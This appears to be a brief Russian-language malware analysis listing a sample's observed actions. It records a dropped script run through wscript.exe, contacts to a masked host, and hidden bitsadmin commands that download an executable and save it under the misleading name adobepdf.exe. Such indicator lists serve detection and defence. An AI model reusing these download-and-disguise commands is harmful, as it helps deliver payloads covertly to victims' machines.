Техническая информация
- '<SYSTEM32>\wscript.exe' "%APPDATA%\dropx.js"
- %APPDATA%\dropx.js
- 'th#.#arth.li':443
- 'th#.#arth.li':443
- DNS ASK th#.#arth.li
- '<SYSTEM32>\bitsadmin.exe' /transfer 0 https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe %APPDATA%\adobepdf.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer 0 https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe %APPDATA%\adobepdf.exe